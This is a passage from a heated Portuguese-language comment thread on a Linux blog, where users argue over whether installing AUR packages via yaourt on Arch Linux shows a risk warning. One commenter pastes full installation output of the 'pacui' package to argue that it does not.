    Então, se INFRINGEM as boas praticas, disponibilizadas pela distribuição, se NÃO lerem a documentação, se não possuem conhecimentos básicos para a resolução de problemas, estão á espera do que?

    PROBLEMAS, nunca vão faltar,seja em que software for ou SO, sejam eles fechados ou Open Source.

    Nos Open Source, ainda os podemos analisar, reportar o bug, nós mesmos arranjar o problema localmente, etc.

    Portanto, o PROBLEMA ou o NÃO PROBLEMA, é SEMPRE o UTILIZADOR.

    Responder
    1. Avatar de ademirt
      ademirt

      @arc, eu também uso o archlinux (puro) e o ubuntu.

      Sabe o que é Antolhos? pois parece que os linux-lovers usam isto.
      Dica: antolhos não é distribuição linux.

      Desde o início eu havia escrito: No Archlinux se utilizar o AUR package também há riscos como o SNAP.

      Porém VOCÊ discordou, veja o que você escreveu:

      arc 18 de Maio de 2018 às 09:07

      @adermit, NÃO RESPONDEU, COM VERDADE AO SEU COMENTÁRIO:

      “Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:

      Pacote sem suporte, potencialmente perigoso.”

      EU gostava de ver, um exemplo PRATICO, REAL, OBJECTIVO, de tal afirmação, acontecer na sua máquina com Arch Linux, ou com um qualquer derivado de Arch Linux.

      Estou precisamente a falar dessa mensagem, e o OUTPUT de uma instalação de uma qualquer aplicação instalada via repositório AUR,…NUNCA será esse o OUTPUT:

      Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:

      Pacote sem suporte, potencialmente perigoso.

      PERCEBEU, OU DESEJA QUE EU LHE FAÇA UM …DESENHO?!?!

      Meu caro, NÃO INSISTA:

      “São totalmente não-oficiais e não foram examinados completamente, então eles devem ser usados por sua conta e risco.”

      POIS, mas isso é totalmente diferente do OUTPUT, como você deu a entender.

      Isso, é um ADVERTÊNCIA existente na documentação do AUR…e essa ADVERTÊNCIA ….NÃO APARECE EM CASO ALGUM, quando se instala qualquer pacote via repositório AUR!!!!

      MAS EU VOU DAR, o EXEMPLO, para PROVAR QUE VOCÊ….MENTIU!!!:

      [arc@zeus-orbital ~]$ yaourt -S pacui
      [sudo] password for arc:
      a resolver dependências…
      a procurar pacotes em conflito…

      Pacotes (2) fzf-0.17.3-2 pacui-1.10.2-1

      Tamanho Total Instalado: 3,10 MiB

      :: Continuar a instalação? [S/n]
      (2/2) a verificar chaves no chaveiro [######################] 100%
      (2/2) a verificar integridade dos pacotes [######################] 100%
      (2/2) a carregar ficheiros dos pacotes [######################] 100%
      (2/2) a verificar conflitos em ficheiros [######################] 100%
      (2/2) a verificar espaço disponível no disco [######################] 100%
      :: A processar modificações do pacote…
      (1/2) a instalar fzf [######################] 100%
      Dependências opcionais para fzf
      fish: fish keybindings
      tmux: fzf-tmux script for launching fzf in a tmux pane
      vim: plugin
      zsh: zsh keybindings [instalado]
      (2/2) a instalar pacui [######################] 100%
      Dependências opcionais para pacui
      pacaur: Needed for AUR support. [instalado]
      yaourt: Needed for AUR support. [instalado]
      yay: Needed for AUR support.
      pikaur: Needed for AUR support.
      trizen: Needed for AUR support.
      pacman-mirrors: Needed for Arch Linux mirror support [instalado]
      reflector: Needed for Arch Linux mirror support
      downgrade: Needed for hidden “downgrade” option.
      :: A correr os hooks de pós-instalação…
      (1/1) Arming ConditionNeedsUpdate…
      [arc@zeus-orbital ~]$

      Este é o OUTPUT…TOTAL da instalação de um pacote em Arch Linux, via repositório AUR, com o yaourt.

      Está PROVADO, que o que AFIRMOU (Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:

      Pacote sem suporte, potencialmente perigoso.”

      ONDE ESTÁ ESSE TAL…ALERTA NO MOMENTO DE INSTALAÇÃO OU NO FINALIZAÇÃO DESSA INSTALAÇÃO?!?!?

      Responder
Aviso:

Todo e qualquer texto publicado na internet através deste sistema não reflete, necessariamente, a opinião deste site ou do(s) seu(s) autor(es). Os comentários publicados através deste sistema são de exclusiva e integral responsabilidade e autoria dos leitores que dele fizerem uso. A administração deste site reserva-se, desde já, no direito de excluir comentários e textos que julgar ofensivos, difamatórios, caluniosos, preconceituosos ou de alguma forma prejudiciais a terceiros. Textos de caráter promocional ou inseridos no sistema sem a devida identificação do seu autor (nome completo e endereço válido de email) também poderão ser excluídos.